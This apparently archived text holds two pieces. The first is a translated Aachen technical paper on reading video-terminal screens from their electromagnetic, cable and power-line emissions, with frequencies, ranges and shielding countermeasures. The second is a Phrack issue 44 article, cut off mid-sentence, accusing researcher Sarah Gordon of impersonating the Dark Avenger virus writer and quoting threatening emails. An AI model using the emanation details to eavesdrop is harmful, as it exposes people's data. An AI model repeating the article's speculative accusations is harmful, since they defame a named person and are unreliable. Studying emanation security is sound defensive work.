  7614. transmitted by the emitting instrument as text in clear.  Compromising
  7615. emitted electromagnetic radiation thus jeopardizes the protection and
  7616. security of data.
  7617.  
  7618. The Laboratory for Communication Engineering at the Fachhochschule
  7619. Aachen is developing protective measures against compromising emission
  7620. of radiation.  However, these protective measures can only be effective
  7621. if they are derived from the characteristics, the effects, and risks of
  7622. compromising emitted electromagnetic radiation.  Therefore we first
  7623. consider only the forms of appearance and the characteristics of
  7624. compromising emitted electromagnetic radiation.
  7625.  
  7626. 1.  Compromising Emitted Electromagnetic Radiation
  7627.  
  7628. In this context one often refers only to the so-called computer
  7629. radiation.  But this is only one form of compromising emitted
  7630. electromagnetic radiation.  There are three types of such emissions.
  7631.  
  7632. 1.1.  Types of Compromising Emitted Electromagnetic Radiation
  7633.  
  7634. Figure 1.1 shows an n example of an arbitrary electric device with various
  7635. electric connections:  a power supply line, a high frequency coaxial
  7636. transmission line, and a coolant line with in- and outflux.  This device
  7637. emits three types of compromising electromagnetic radiation:
  7638.  
  7639. 1.  electromagnetic radiation in form of electric and magnetic fields
  7640.     and electromagnetic waves;
  7641.  
  7642. 2.  electromagnetic waves on the outer surface of all coaxial metallic
  7643.     connections (shell waves);
  7644.  
  7645. 3.  electric interference currents and interference voltages in power
  7646.     lines connected to the device.
  7647.  
  7648. Each of the three types can be transformed into the other two.  For
  7649. instance, shell waves can be emitted as fields or waves.  On the other
  7650. hand, electromagnetic waves can be caught by a nearby conductor and can
  7651. propagate on it as shell waves.  These phenomena are the reason for the
  7652. difficult control of compromising electromagnetic radiation, and they
  7653. imply that one must deal with all and not just one form of compromising
  7654. electromagnetic radiation.  Also, electromagnetic protection against
  7655. compromising emitted radiation must deal with all forms of it.
  7656.  
  7657. 1.2. Examples of Compromising Emitted Electromagnetic Radiation
  7658.  
  7659. To exemplify the three types of compromising electromagnetic radiation
  7660. we consider the monitor depicted in figure 1.2.
  7661.  
  7662. 1.2.1.  Compromising Electromagnetic Radiation
  7663.  
  7664. Figure 1.3. shows the experimental set-up.  The video display
  7665. terminal is connected via the power line to the power supply.  The
  7666. power line is surrounded by absorbers so that the terminal can only emit
  7667. electromagnetic radiation.  The absorbers prevent the generation of
  7668. shell waves on the power line.  The dipole antenna of the television
  7669. receiver is 10 m from the video terminal.  Figure 1.4. shows the screen
  7670. of the television receiver after it received and decoded the signal.
  7671. Not only is the large FH=AC well readable but also the smaller letters.
  7672.  
  7673. This demonstration yields the following results:
  7674.  
  7675. *  The video display terminal emits electromagnetic radiation;
  7676.  
  7677. *  Despite being within (standards committee) norms the emitted
  7678.    electromagnetic radiation can be received and decoded across a certain
  7679.    distance;
  7680.  
  7681. *  The electromagnetic radiation emitted by the terminal can be decoded
  7682.    into readable information and symbols on a television screen.
  7683.    Therefore, this emitted radiation is compromising.
  7684.  
  7685. 1.2.2.  Compromising Surface or Shell Waves
  7686.  
  7687. The video display terminal and the television receiver are positioned as
  7688. in figure 1.5.  The power line of the terminal is surrounded by a
  7689. current transformer clamp which absorbs the shell waves.  The television
  7690. screen shows again the picture seen in figure 1.4.  The quality of the
  7691. picture is often better than in the previous case.  Another experiment
  7692. would demonstrate that secondary shell waves can form on a nearby
  7693. conductor.  The emitted radiation is then caught by nearby conductors
  7694. and continues to propagate as shell waves.  These emissions also give
  7695. good receptions but are almost uncontrollable along their path of
  7696. propagation.
  7697.  
  7698. 1.2.3.   Demonstration of Compromising Emitted Radiation Through the
  7699. Power Line
  7700.  
  7701. Figure 1.6 shows the experimental set-up for the proof of compromising
  7702. power supply voltages.  The video display terminal acts as a generator
  7703. whose current and voltage is entered into the power supply.  Using a
  7704. capacitive line probe, the entered signal can be retrieved and fed into
  7705. the television receiver.
  7706.  
  7707. This form of transmission is the known basis for intercom systems or
  7708. so-called babysitter monitors where the signals are transmitted from
  7709. room to room via the energy supply lines in a home.  As in the case
  7710. of electromagnetic radiation or shell waves, one obtains the same
  7711. picture quality as in figure 1.4.
  7712.  
  7713. 2.  Facts About Compromising Emitted Radiation
  7714.  
  7715. Protective measures against compromising emitted radiation are not only
  7716. determined by the above-mentions\ed three types of compromising
  7717. emissions but also by taking into account the following data:
  7718. #    level of intensity and spectral distribution;
  7719. #    frequency (emission frequency) and frequency range;
  7720. #    directional characteristics of the radiation.
  7721. These data can then be used to derive the damping and the
  7722. amplitude-frequency response for the protective measure and its
  7723. location.
  7724.  
  7725. 2.1.  Emission Spectrum and Level of Intensity
  7726.  
  7727. The spectral distribution of compromising emitted radiation depends on
  7728. the frequencies used to generate the picture on a screen.  The regular
  7729. repetition of dots and lines gives rise to the video and line frequency
  7730. which is found in the spectrum.  However, the emission of video or line
  7731. frequencies is not compromising since their knowledge does not yet give
  7732. access to processed data.  If the lines are covered regularly by
  7733. symbols, a symbol frequency is obtained which is also detectable in the
  7734. spectrum.  A single symbol consists of a dot or pixel matrix.
  7735.  
  7736. The dot matrix of the symbol @ is also known in figure 2.1  The electron
  7737. beam scans the individual dots or pixels line-by-line and keys them
  7738. bright or dark.  This keying is done using the so-called dot or pixel
  7739. frequency.  For instance, the highest keying frequency is obtained by
  7740. scanning the center of the @ symbol since there one has a long sequence
  7741. of successive bright and dark pixels.  It also follows from figure 2.1
  7742. that the keying is slower, i.e., the keying frequency is lower, along
  7743. the upper part of the @ symbol because of a long sequence of only dark
  7744. or bright pixels.  It follows that the emissions due to the keying
  7745. frequency are highly compromising since they give direct information
  7746. about the structure of the picture.
  7747.  
  7748. Until recently, the frequencies in the following table were used:
  7749.  
  7750.         video frequency             45  Hz - 55 Hz
  7751.         line frequency              10 kHz - 20 kHz
  7752.         symbol frequency             2 MHz -  5 MHz
  7753.         dot or pixel frequency      15 MHz - 20 MHz.
  7754.  
  7755. The pulses for the electron beam are formed in the video part, i.e., the
  7756. video amplifier, of the monitor.  Therefore, the cathode-grid of the
  7757. picture tube and the video amplifier are the main emitters of radiation.
  7758. The upper diagram in figure 2.2 shows the calculated spectrum for the
  7759. cathode-keying.  It represents a sequence of dots from the center of the
  7760. @ symbol using a dot-sequential frequency of 18 MHz.  The diagram in the
  7761. center of figure 2.2 shows the measured spectrum at the keyed cathode of
  7762. the picture tube.  The agreement between the calculated and measured
  7763. spectrum for the frequency is clearly visible.  However, the calculated
  7764. and measured spectral representation differ in the form of the envelopes.
  7765. In the measured spectrum one finds an amplitude increase between 175 MHz
  7766. and 225 MHz.  This increase is usually found in the same or similar form
  7767. in monitors.  The reasons for this amplitude increase are design,
  7768. construction parts, and dimensions of the video display terminal.  In
  7769. the lower part of figure 2.2 we see the compromising radiation emitted by
  7770. the terminal as measured at a distance of 10 m.  The spectrum of the
  7771. radiation emitted by the terminal is superimposed by broadcast, radio
  7772. and interference spectra since the measurement took place on open
  7773. ground.  Despite this interference one can recognize the typical form of
  7774. the cathode spectrum.  The increase in the amplitude between 175 MHz
  7775. and 225 MHz presents a particular risk since the television transmitters
  7776. for Band III operate within this frequency range and all television sets are
  7777. tuned to it (see figure 2.2).
  7778.  
  7779. A comparison of the intensity level of the television transmitter with the
  7780. level of the compromising radiation in figure 2.2 shows their agreement.
  7781. It is therefore not very difficult to receive the compromising radiation in
  7782. proximity of the emitter using only a regular television set with normal
  7783. sensitivity.
  7784.  
  7785. Figure 2.3 shows the spectral distribution of compromising shell waves
  7786. emitted by the video display terminal.  Here again one recognizes the
  7787. particular form of the dot or pixel frequency.  The height of the shell wave
  7788. spectrum is much lower at higher frequencies than the height of the
  7789. radiation spectrum.  The shell waves have lower intensity in the range of
  7790. broadcast television but higher intensity in the range of cable television.
  7791. To receive the shell waves a television set must be cable-ready.
  7792.  
  7793. Figure 2.4 shows the spectrum for the third type of emission:  the
  7794. compromising currents and voltages entering the power supply lines.  It
  7795. is very similar to the shell wave spectrum.  The height of this spectrum at
  7796. higher frequencies is even smaller than the shell wave spectrum.  In
  7797. order to receive any signal a cable-ready television set must be used.
  7798. The intensity of the currents and voltages is so high that they can
  7799. easily be received using a regular television set with normal
  7800. sensitivity.
  7801.  
  7802. 2.2.  Frequency and Frequency Range
  7803.  
  7804. It follows from figures 2.2, 2.3, and 2.4 that the best reception for
  7805. the three types of emissions is for the following frequencies:
  7806.  
  7807.         compromising radiation      approx. 200 MHz;
  7808.         compromising shell waves    approx. 60 MHz;
  7809.         compromising voltages       approx. 20 MHz.
  7810.  
  7811. The video information of the picture on the monitor has a frequency
  7812. range of half a spectral arc.  The frequency range of the receiver must
  7813. therefore be 10 MHz for all three types of emission.
  7814.  
  7815. 2.3.  Directional Characteristics of the Radiation
  7816.  
  7817. Figure 2.5 shows the directional characteristics for compromising
  7818. radiation emitted by a video display terminal inside a plastic casing.
  7819. According to this diagram the lateral radiation dominates.  The field
  7820. intensity along the front and back direction is about 30% of the lateral
  7821. intensity.  The power of the emitted radiation along these directions is
  7822. only about 10% of the power emitted laterally.  The range for the
  7823. emitted radiation along the front and back direction is therefore also
  7824. reduced to 30%.  This phenomenon suggests for the first time a
  7825. protection against compromising radiation, namely proper positioning of
  7826. the device.
  7827.  
  7828. The compromising shell waves and power line voltages propagate according
  7829. to the configuration of the lines.  There is no preferred direction.
  7830.  
  7831. 2.4.  Range
  7832.  
  7833. The range of compromising radiation emitted from a video display
  7834. terminal is defined as the maximum distance between the emitting
  7835. terminal and a television receiver and readable picture.
  7836.  
  7837. The range can be very different for the three types of emitted
  7838. radiation.  It depends on the type of emitter and the path of
  7839. propagation.
  7840.  
  7841. The spectacular ranges for emitted ranges are often quoted - some of
  7842. which do not always come from the technical literature - give in general
  7843. no indication just under which conditions they were obtained.  It is
  7844. therefore meaningful to verify these spectacular ranges before using
  7845. them.
  7846.  
  7847. 2.4.1.  The Range of Compromising Emitted Radiation
  7848.  
  7849. The dependence of the field intensity on distance is illustrated in
  7850. figure 2.6.
  7851.  
  7852. The dependence of the range on the receiver used is shown at 25 m, 40 m,
  7853. and 80 m.  The field intensity  at 25 m is just strong enough to receive
  7854. a picture with an ordinary television receiver using the set-up in figure
  7855. 1.3.  If one uses a narrow-band television antenna or a noiseless antenna
  7856. amplifier than the field intensities at 40 m and 80 m, respectively, are
  7857. still strong enough to receive a legible picture.
  7858.  
  7859. The flattening out of the curve at large distances suggests that the
  7860. range can be increased to several hundred meters by using more sensitive
  7861. antenna or better receivers.  The range can also be increased through a
  7862. high altitude connection, for instance, if both emitter and receiver are
  7863. in or on a high rise.  This was verified by an experiment involving two
  7864. high rises separated by over 150 m.  A very clear picture was received
  7865. using a relatively simple antenna with G = 6 db.
  7866.  
  7867. 2.4.2.  Range of Compromising Shell Waves
  7868.  
  7869. Measurements have shown that shell waves can propagate across a large
  7870. area without any noticeable damping if only the surrounding metallic
  7871. conductors extend also across the entire area.
  7872.  
  7873. The propagation is reduced considerably by a metallic conductor that
  7874. crosses metallic surfaces such as metal walls or metallic grids such as
  7875. reinforcements in concrete walls.
  7876.  
  7877. Dissipative building materials also damp shell waves.  Lightweight
  7878. construction such as the use of dry walls or plastic walls in large
  7879. buildings increases the range of shell waves to about 100 m without the
  7880. picture becoming illegible.
  7881.  
  7882. 2.4.3  Range of Emissions Through Power Supply Lines
  7883.  
  7884. In this case the conditions are even less clear than in the previous
  7885. cases.  It must be assumed that inside a building the compromising
  7886. currents and voltages can be received through the phase of the power
  7887. supply lines feeding the video display terminal .  The possibility of
  7888. receiving the signal through other phase lines by coupling across phases
  7889. in the power supply line cannot be excluded.
  7890.  
  7891. The range depends very much on the type of set-up and the instruments
  7892. used.  It is conceivable that a range of about 100 m can be obtained.
  7893.  
  7894. 3.  Protective Measures
  7895.  
  7896. Protective measures fall into three categories:
  7897.  
  7898.     -   modification of devices and instruments by changing procedures
  7899.         and circuitry;
  7900.     -   heterodyning by noise or signals from external sources;
  7901.     -   shielding, interlocking, and filtering.
  7902.  
  7903. 3.1.  Instrument Modification
  7904.  
  7905. The instrument modifications consist of changing the signal processing
  7906. method and the circuitry of the instrument.  It is the objective of
  7907. these measures to alter the spectral distribution and intensity of the
  7908. emitted radiation in such a way that the reception by television sets or
  7909. slightly modified television sets is no longer possible.
  7910.  
  7911. For instance, a change of procedure could consist of a considerable
  7912. increase in the dot or pixel frequency, the symbol and line frequencies.
  7913. A reduction in the impulse amplitude and impulse slope also changes the
  7914. reduction in the impulse slope also changes emission spectrum so that
  7915. reception is rendered more difficult.  However, the subsequent
  7916. modification of the video display terminal has serious disadvantages of
  7917. its own: First of all, the user of video display terminals does in
  7918. general not possess the personal and apparative equipment to perform the
  7919. modifications.  To complicate things further, the so-modified
  7920. instruments loose their manufacturer's warranty and also their permit of
  7921. operation issued by governmental telecommunication offices.  A subsequent
  7922. instrument modification by the user is for these reasons in general out
  7923. of question.
  7924.  
  7925. 3.2. HETERODYNING STRATEGY
  7926.  
  7927. We refer to a protective measure as a heterodyning strategy whenever the
  7928. compromising emitted radiation is superimposed by electromagnetic noise
  7929. of specific electromagnetic signals.
  7930.  
  7931. The television set receives the compromising emitted radiation together
  7932. with the superimposed noise of spurious signal.  The noise or the
  7933. spurious signal are such that a filtering out or decoding of the
  7934. compromising emitted radiation by simple means is impossible.
  7935.  
  7936. Since the noise and the spurious signal not only interfere with the
  7937. television receiver of the listener but also with other television sets
  7938. in the vicinity the heterodyning strategy is by all means in violation
  7939. with the laws and regulations governing telecommunications.  As far as
  7940. is known, this is a protective measure only used under extremely
  7941. important circumstances involving high government officials.
  7942.  
  7943. 3.3  Shielding
  7944.  
  7945. In contrast to the previously considered protective measures, shielding
  7946. has two important advantages:
  7947.  
  7948. *   shielding protects not only against compromising emitted radiation
  7949.     but also against electromagnetic emissions which can enter data
  7950.     processing devices from the outside and cause interference;
  7951. *   furthermore, shielding neither violates the laws governing the use
  7952.     of telecommunications nor does it jeopardize the manufacturer's
  7953.     warranty.
  7954. The term shielding is used here to describe, shielding, interlocking,
  7955. and filtering.
  7956.  
  7957. 3.3.1.  Shielding Data
  7958.  
  7959. The requirements on a shield are described by the shield damping.  The
  7960. shield damping is twenty times the logarithm of the ratio between the
  7961. electric or magnetic field intensity inside the shield and outside the
  7962. shield.
  7963.  
  7964. Actual applications and individual situations may require different
  7965. values for the shield.  The shield data are derived from the so-called
  7966. zone model.  In the zone model one considers the type and intensity of
  7967. the emitted radiation, the composition of the path of propagation, and
  7968. the local accessibility for the receiver.
  7969.  
  7970. The shield data not only influence the shield damping but also the
  7971. frequency range of the shield's effectiveness.  Figure 3.1 shows a
  7972. diagram listing different types if shields according to regulations MIL
  7973. STD 285 and 461B, NSA 656, and VG norms 95 375.
  7974.  
  7975. 3.3.2.  Applicability of Shielding
  7976.  
  7977. Electromagnetic shielding can be used on emitting or interfered with
  7978. instruments, on building and rooms, and on mobile cabins.
  7979.  
  7980. 3.3.2.1.  Shielding of Instruments
  7981.  
  7982. The shielding of instruments though it can often be done very quickly
  7983. and effortlessly is not without problems.
  7984.  
  7985. In general but especially after subsequent installation, it can lead to
  7986. a loss in design and styling of the shielded device.  Openings in the
  7987. shield, for instance for ventilation or control and operating elements,
  7988. cannot always be sealed off completely.  In this  case they are emission
  7989. openings with particularly high emission rates.
  7990.  
  7991. Trying to maintain ergonometric conditions - good viewing conditions for
  7992. the users - renders the shielding of screens especially difficult.  If
  7993. the casing of the instruments is not made of metal but of plastic, the
  7994. following shielding materials are considered: metal foils, metal cloth,
  7995. metal-coated plastics, electrolytical layers and coats of metallic paint
  7996. or paste.  Recently, the plastics industry is also offering metallized
  7997. plies of fabric.  Such glasses are for instance offered by VEGLA,
  7998. Aachen.  Ventilation openings are sealed off with metallic fabric of
  7999. honey-comb wirings.
  8000.  
  8001. Interlocking systems and filters on all leads coming out of the
  8002. instrument prevent the emission of compromising shell waves and power
  8003. supply voltages.
  8004.  
  8005. 3.3.2.2.  Building and Room Shielding
  8006.  
  8007. There are some advantages in shielding buildings and rooms.  The
  8008. building and room shielding lies solely in the competence of the user.
  8009. Minor restrictions dealing with the static of the building and local
  8010. building regulations only occur with external shielding.  Building and
  8011. room shielding offers a protection that is independent of the instrument
  8012. or its type.  It is a lasting and effective protection.  Maintenance is
  8013. minimal, and subsequent costs hardly exist.  Interior design and room
  8014. lay-out are not changed.
  8015.  
  8016. If one requires better shielding values or a building and room design
  8017. which emphasizes better comfort than greater expenses and thus higher
  8018. costs will occur.
  8019.  
  8020. 3.3.2.3.  Cabin Shielding
  8021.  
  8022. Cabin shielding has all the advantages of building and room shielding.
  8023. In addition, cabin shielding is not affected by the static of the
  8024. building or local building regulations.  Furthermore, cabin shielding
  8025. requires less expenses and costs than building or room shielding.
  8026.  
  8027. However, shielded cabins do not offer the same comfort or interior
  8028. design as shielded buildings or rooms.
  8029.  
  8030. 3.3.3.  Shielding Components
  8031.  
  8032. Electromagnetic shielding consists of three components:
  8033. #   the actual shield together with various structural elements as a
  8034.     protection against emitted radiation;
  8035. #   the interlocking of all non-electric and electric supply lines to
  8036.     protect against shell waves;
  8037. #   electric filters at all supply lines to protect against compromising
  8038.     power supply voltages.
  8039.  
  8040. 3.3.3.1.  The Electromagnetic Shield
  8041.  
  8042. The shield consists of the hull and the shielding structural elements.
  8043.  
  8044. 3.3.3.1.1.  Shield Hull - Method and Construction
  8045.  
  8046. In general, one uses metal sheets or metal foil to construct
  8047. electromagnetic shields for buildings and rooms.  If one lowers the
  8048. requirements  on the shield damping and the upper limit frequency then
  8049. screen wire, metallic nets, and - if properly constructed - even the
  8050. reinforced wire net in concrete can be used; the obvious disadvantage
  8051. is that the settlements or movements of the building can cause cracks
  8052. that will render the shield ineffective.
  8053.  
  8054. Therefore, only metal shields or strong wire netting is used for the
  8055. construction of electromagnetically shielded cabins.
  8056.  
  8057. The building or room shield can be built using several construction
  8058. principles.  Figure 3.2 above shows the essential construction principles.
  8059.  
  8060. For the Sandwich construction, the shield is between the outer and inner
  8061. layer of the wall.  A new type of construction uses the Principle of
  8062. the Lost Form.  The shield itself which consists of 3 to 5 mm thick
  8063. sheet iron is used as an inner layer in the manufacturing of concrete
  8064. walls.  The sheets touch one another and have to be welded together at
  8065. the contact points.  If the building or room shields he\ave to satisfy a
  8066. special purpose then they have to be grounded at only one point; they
  8067. have to be assembled in such a way that they electrically insulate
  8068. against the building or room walls.  The so-called inner shields offer
  8069. this protection.  In simple cases, the inners shield is placed on top of
  8070. the walls maintaining insulation by using a special underneath
  8071. construction.  However, this space-saving and simple construction has a
  8072. disadvantage; the part of the shield that faces the wall such as
  8073. corrosion, settling or moving of the building, or damages due to work on
  8074. the exterior of the building can no longer be detected.  The use of
  8075. non-corrosive shield material or sufficient back ventilation of the
  8076. shield protects against corrosion in these cases.  The self-supporting
  8077. inner shield is suspended from a supporting grid construction.  This
  8078. construction can be similar to a cabin construction.  In the case
  8079. of large rooms, such as halls, one should use a truss for statistical
  8080. reasons.  The self-supporting inner shield has the advantage of
  8081. accessibility, although the usable room volume has been decreased.
  8082.  
  8083. In rooms where the shield is exposed to only slight mechanical wear and
  8084. tear and not required to shield completely, shielding metal foil is
  8085. glued directly to the wall and welded at the contact points.
  8086.  
  8087. The floor construction is almost the same for all four construction
  8088. principles.  It is important that the floor onto which the shield is
  8089. placed is protected from humidity and is even.  In the case of
  8090. electrically insulating layers of, for instance, laminated paper or PVC
  8091. are first put on the floor.  The ceiling construction depends on the
  8092. specific requirements and necessities.  The ceiling shield can be a
  8093. suspended metallic ceiling or a self-supporting ceiling construction.
  8094.  
  8095. 3.3.3.1.2. Shield Construction Elements
  8096.  
  8097. Construction elements which seal off viewing openings or access openings
  8098. are called shield construction elements.  Access openings are doors, gates,
  8099. and hatches.  Viewing openings are windows.
  8100.  
  8101. The shielded doors, gates, and hatches serve two purposes: first to
  8102. close off the room, and second to shield the room.
  8103.  
  8104. The door, gate, or hatch shield is in general made of sheet iron.
  8105. Passing from the door or gate shield to the room shield causes
  8106. shield-technical problems.  A construction which is due to the company
  8107. of TRUBE & KINGS has proven to be especially effective for this kind of
  8108. problem (see figure 3.3).
  8109.  
  8110. The set-on-edge door shield, the so-called knife, is moved into a
  8111. U-shape which contains spring contacts.  The difference between this and
  8112. other available constructions is that the knife is not moved into the
  8113. spring upward.  This construction reduces the wear and tear of the
  8114. transition point between door and room shield and thus increases the
  8115. durability of the construction which implies a better protection and
  8116. higher reliability.  This construction by TRUBE & KINGS satisfies the
  8117. highest requirements on shield damping.
  8118.  
  8119. Windows in shielded room are sealed off with the shielding glass or
  8120. so-called honey-comb chimneys.  It si understood that these windows are
  8121. not to be opened.  Figure 3.4 shows the cross-section of a glass
  8122. especially developed by VEGLA for data processing rooms.  The glass
  8123. consists of multiple layers which are worked into a very fine metallic
  8124. net and an evaporated metallic layer.  The thickness of the wire is in
  8125. the range of a few micrometers so that the net is hardly visible.  This
  8126. glass can also be manufactured so that it is rupture- and fire-resistant
  8127. and bullet-proofed.
  8128.  
  8129. Using glass one can reach shield dampings in the medium range (refer to
  8130. figure 3.1).  Specially manufactured glass reaches even higher shield
  8131. dampings.
  8132.  
  8133. Figure 3.4 also shows the so-called honey-comb chimneys as manufactured
  8134. by SIEMENS.  Visibility and the comfort of light are highly restricted.
  8135. But the advantage is that this type of shielding satisfies the
  8136. requirements for highest shield damping.
  8137.  
  8138. 3.3.3.2.  Interlocking
  8139.  
  8140. All non-electric supply lines leaving a shielded room must be
  8141. interlocked in order to protect against the propagation of shell and
  8142. surface waves.  Water pipes, heating pipes, pneumatic and hydraulic
  8143. pipes are connected via rings to the metallic shield.  Depending on the
  8144. required frequency range, the pipe diameter is also subdivided by filter
  8145. pieces.  At high frequencies on can achieve dampings of up to 100dB
  8146. using such interlocking devices.
  8147.  
  8148. The ventilation of shielded rooms may cause problems.  Problems will
  8149. occur if shield dampings up to the highest frequencies are required.  In
  8150. this case one has to use two-step ventilation filters.  The first step
  8151. consist of adding concave conductor filters which work for the
  8152. frequencies up to 200 GHz, the second step of adding absorber filters
  8153. which protect against compromising emitted frequencies above 200 GHz.
  8154.  
  8155. Figure 3.5 shows the set-up for the above-described ventilation lock
  8156. which is due to the SCHORCH.
  8157.  
  8158. 3.3.3.3.  Electric Filters
  8159.  
  8160. Filters must be put on electric power supply lines, telephone wires, and
  8161. data processing supply lines at the room exit point.  The filters have
  8162. to be installed at the shield.
  8163.  
  8164. The filters used here are the same as the ones shown in the area of
  8165. electromagnetic compatibility.
  8166.  
  8167. 4.  Summary
  8168.  
  8169. Electric devices used in data processing, data transmission and data
  8170. handling emit electromagnetic radiation, electromagnetic shell and
  8171. surface waves, and currents and voltages in power supply lines,
  8172. telephone wires, and data supply lines.
  8173.  
  8174. If this emitted radiation carries actual data or information from the
  8175. data processing device then it is compromising.
  8176.  
  8177. Using a television receiver, it is very easy to receive, decode and make
  8178. these compromising emissions legibly.  Several possibilities present
  8179. themselves as protective measures against compromising emissions from
  8180. data processing and data transmitting equipment.  The use of shielding
  8181. in the form of room shields, interlocking of supply lines, and filters
  8182. for electric lines is the best protection for the user of data
  8183. processing, data transmitting, and data handling equipment.                              ==Phrack Magazine==
  8184.  
  8185.                  Volume Four, Issue Forty-Four, File 11 of 27
  8186.  
  8187. ****************************************************************************
  8188.  
  8189. [Editor's Note:
  8190.  
  8191.   The following two files are very interesting.  I never paid ANY
  8192.   attention to the realm of our community that focus on virii.  For
  8193.   some reason, the whole idea behind them is a novel concept, but
  8194.   I never saw any reason to take notice of them.  Even when I've
  8195.   given lectures, I always leave discussion about virii out, since
  8196.   they should be a moot point.  I mean, when "fdisk /mbr" will take
  8197.   care of so many problems, what's the big deal?
  8198.  
  8199.   I know I'm over-simplifying things, but jesus...
  8200.  
  8201.   Well, while I continued to overlook this small but earnest group
  8202.   of folks who dabble in virii, all kinds of things began to happen.
  8203.   Groups formed, rivalries flared, paranoia ran rampant and one of the
  8204.   most ridiculous cottage industries in the history of personal
  8205.   computing appeared (living on the spread of Fear, Uncertainty and
  8206.   Doubt.)
  8207.  
  8208.   Well, in all of this several names have popped up as potential threats
  8209.   to this little world.  One in particular, Sarah Gordon, even got the
  8210.   spotlight as a paranoid, BBS-busting, hacker-bashing psychopath in a
  8211.   rather ill-researched and hastily prepared Phrack piece a few years
  8212.   back.  It is rather odd that in all the hype we in the underground
  8213.   drum up, no one ever bothers to get the other side of the story, so we
  8214.   feed the fervor and continue the paranoia.
  8215.  
  8216.   Well, with this in mind, I received a file claiming to have info
  8217.   regarding the big "expose" of Sarah masquerading as the Dark Avenger.
  8218.   Now, even a moron like me has heard of the Dark Avenger, so I read it.
  8219.   After doing so, I wanted to pipe it to /dev/null, but then decided it
  8220.   would be much more fun to send it to Sarah too, and let her respond to it.
  8221.  
  8222.   It's amusing as hell, and just goes to show that the underground
  8223.   has as many similarities in its distinct groups as it does
  8224.   differences.]
  8225.  
  8226. -----------------------------------------------------------------------------
  8227.  
  8228.  
  8229.          Sara(h?) Gordon AND THE DARK AVENGER SCAM.
  8230.          By Kohntark
  8231.  
  8232.  
  8233.          In one of my many online conversations with Sara Gordon
  8234.          I once asked her about the validity of the VNI interviews and
  8235.          her real relationship with the alleged dark avenger; after
  8236.          logging into her VFR BBS and seeing a #2 (hers being #1)
  8237.          account named after him.
  8238.          I proceeded to leave a message for the dark avenger there,
  8239.          claiming that the whole account was bogus as it is highly
  8240.          improbable that this person might call all the way from
  8241.          Bulgaria and log into a mediocre BBS just to chat with her,
  8242.          considering the expense of such long distance call , the
  8243.          economic situation in Eastern Europe and a fact that
  8244.          would learn later: Sara(h) Gordon has an account on the
  8245.          Bulgarian DIGSYS unix server, locally accessible by phone
  8246.          from there!
  8247.  
  8248.          As it was expected, Sara(h) quickly 'noticed' my personal
  8249.          message to the dark avenger and replied to my questioning in
  8250.          a public post in FIDONET, (I don't read FIDONET posts and she
  8251.          knows I have no access to them!!!! )
  8252.          She claimed that the dark avenger was fully aware of how much
  8253.          money she made out of the VNI interviews and that she was in
  8254.          touch with him, etc.etc.
  8255.  
  8256.          Afterward, I questioned her again about the whole affair
  8257.          and demanded a proof, or some sort of direct contact from the
  8258.          dark avenger to my anonymous internet account.
  8259.  
  8260.          Since this was the first time anyone had ever questioned the
  8261.          validity of her relationship with the DA, she took this to
  8262.          heart and shortly after, I received 3 short messages
  8263.          originating from <dav@danbo.digsys.bg> an Internet connected
  8264.          UNIX system in Bulgaria.
  8265.  
  8266.          Here they are:
  8267.  
  8268.          (Private, compromising parts are X'd out)
  8269.          1st Message:
  8270.  
  8271. --------------------------------------------------------------------------------
  8272. -
  8273. From daemon@digsys.bg Wed Jul 14 19:07 EDT 1993
  8274. Received: from danbo.digsys.bg by XXXXXXXXXXXXXXXXXXXXXX; Wed, 14 Jul 93 19:07:3
  8275. 4 -0400
  8276. Return-Path: <dav@danbo.digsys.bg>
  8277. Received: by XXXXXXXXXXXXXX (5.67/1.35)
  8278.         id AA12850; Thu, 15 Jul 93 02:04:46 +0300
  8279. Message-Id: <9307142304.AA12850@XXXXXXXXXXXX>
  8280. To: XXXXXXX
  8281. From: dav@danbo.digsys.bg
  8282. Date: Wed, 14 Jul 93 23:41:36 +0300
  8283. Subject: No subject
  8284. Status: RO
  8285.  
  8286.  
  8287. kohntark-
  8288.  
  8289. i just talked to a friend of mine who said you dont like her user
  8290. log. why shouldnt i call her from bulgaria? i call whoever i want
  8291. to, and this is not your problem.
  8292.  
  8293. by the way, she sent me your mail. for your information, i do
  8294. know how much money she made of that interview. and i also think
  8295. that this is none of your business.
  8296.  
  8297. also, maybe it would be good for you to know, that by offending
  8298. her, you are offending me, too. keep this in mind.
  8299.  
  8300. <dav>
  8301. Second Message:
  8302. -------------------------------------------------------------------------
  8303.  
  8304.  
  8305. >My mail with her is none of your business either.
  8306.  
  8307. i dont think so, dude.
  8308.  
  8309.  
  8310. maybe you need to read the next few lines again,
  8311. in case you missed them.
  8312.  
  8313.  
  8314. >>
  8315. >> also, maybe it would be good for you to know, that by offending
  8316. >> her, you are offending me, too. keep this in mind.
  8317. >>
  8318. >> <dav>
  8319.  >
  8320.  >HA HA! and you expect me to believe that you are the DA!
  8321.  >send me a proof: an email address from bulgaria or tell me
  8322.  >how many addressing modes does the MTE have?
  8323.  >
  8324.  >nice try.
  8325.  
  8326.  
  8327.  well, what do you think the domain .bg in my email address stands for?
  8328.  maybe you think its kameroon?
  8329.  as for the mte, im not giving you any info.
  8330.  
  8331.  i need not prove anything to anybody, and certainly dont plan to waste more
  8332.  of my time talking to you. you have been warned.
  8333.  
  8334.  
  8335. <dav>
  8336.  
  8337. Third Message:
  8338. -------------------------------------------------------------------------
  8339.  
  8340.  oh, yeah. sure it did.
  8341.  only you will not know where something else came from, when it knocks on your
  8342.  door. i have nothing more to say.
  8343.  
  8344. -------------------------------------------------------------------------
  8345.  
  8346.  
  8347.          In my ignorance, I blindly trusted the three cryptic replies
  8348.          to be true, even thought whoever replied refused to give out
  8349.          trivial information such as the number of addressing modes
  8350.          for a 2 year old encryption engine (MTE) and spelled Cameroon
  8351.          with a 'k' (Check out Sara Gordon's spelling of URUGUAY in
  8352.          VIRUS-L Volume 6 Issue 120 -v06i120)
  8353.          Shortly after other unrelated discussions and a CUD post from
  8354.          Sara(h) in which I was mentioned (unnamed), someone warned me
  8355.          of several posts in NUKENET by an alleged dark avenger and
  8356.          Todor Todorov from an account belonging to the last,
  8357.          mentioning me and Aristotle.
  8358.          In those messages I was referred to as 'hotshot,' a word that
  8359.          Sara Gordon had used on me several times on our personal
  8360.          email exchange; It was then that I became highly suspicious
  8361.          of the whole matter.
  8362.  
  8363.          I called Virginia's Virus Research Institute's sysop and
  8364.          owner, Aristotle to find out more about the posts and he
  8365.          bought to my attention the particular writing style of
  8366.          Sara(h) Gordon: She NEVER uses capital letters and
  8367.          apostrophes on her personal email, and always signs her name
  8368.          on the lower left hand corner. (She seldom signs her posts
  8369.          nowadays and changes her user name in her vfr@netcom.com
  8370.          account every week!; for further proof of her writing style,
